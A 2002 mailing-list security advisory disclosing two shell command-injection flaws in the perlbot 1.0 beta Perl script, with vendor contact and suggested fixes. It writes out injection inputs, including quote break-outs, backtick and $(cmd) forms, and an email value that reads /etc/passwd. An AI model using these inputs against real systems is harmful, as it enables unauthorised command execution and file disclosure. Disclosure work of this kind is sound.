81655 2002-10-19  01:04  /111 rader/ guejez <guejez@scan-associates.net>
Importerad: 2002-10-19  01:04  av Brevbäraren
Extern mottagare: vulnwatch@vulnwatch.org
Mottagare: Bugtraq (import) <2017>
Ärende: SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution
------------------------------------------------------------
perlbot 1.0 beta - Remote Command Execution
Discovered By guejez of scan-associates.net

 About perlbot:
 ------------------
 [quote from perlbot website]

 ""

 [/quote from perlbot website]

 perlbot is avaliable at http://stigmata.gothcafe.com/~madhater


 Vulnerable (tested) Versions:
 --------------------
 Perlbot version 1.0 beta on SuSe 7.3


 Vendor Contact:
 ----------------
 07-22-02 - Emailed myneid ^^at^^ gothcafe.com Alerted him of this
vulnerability
 07-22-02 - Recieved email confirming vulnerabilties and stating fixes could
be
            in new version.


 Vulnerabilities:
 ----------------
 -- Command Execution

 1. Due to no input filtering and a call to the shell the script could be
used to
    execute any command it has permission to.

    A more detailed explaination:

 The script does not limit the characters sent to the shell from user
 input.  The problem is in this line:

 foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)

 Which allows an attacker to "break out" of the quotes and issue any
 command
 they wish by doing something like anything";cmd.  Other abuses could be
issuing
 commands with `cmd` and $(cmd) or \xxx where xxx is the octal value of any
 character.  Some form of user input filtering must be used.


 2. Due to no input filtering and a bad open() call when the script attempts
to send
    email it is possible to execute commands.

    A more detailed explaination:

 The script attempts to send an email to the user.  It takes the user's
email
 address and passes it to the shell as an argument to the mail program:

 open (MAIL,"| $sendmail $recipient") || die $!;

 This means things like hacker@scan-associates.net < /etc/passwd
could be used as
 an email address to get any file from the system the script has
permission to
 read.  Or command execution is possible with
hacker@scan-associates.net ; cmd.
 Inorder to prevent this simply take the $recipient value out of the
shell call.


 Proof Of Concept:
 -----------------
 No proof of concept will be givin for these issues.


 Fix:
 ----
 According to the author a fix could be in a new verison of the
script.  The script's
 homepage was down at the time of this advisory, so here is the suggested
fix.  Replace
 the following line:

 my $word=$';

 With:

 my $word=$';
 $word =~ s/[^\w]//g;

 And replace the following line:

 open (MAIL,"| $sendmail $recipient") || die $!;

 With:

 open (MAIL,"| $sendmail -t") || die $!;


 Thanks:
 -------
 irc.efnet.org #vuln - various people helping with perl security issues.
 pokleyzz, sk , and all of scan-associates.net


--------------------------------------------------------------------------
http://www.scan-associates.net/
(81655) /guejez <guejez@scan-associates.net>/(Ombruten)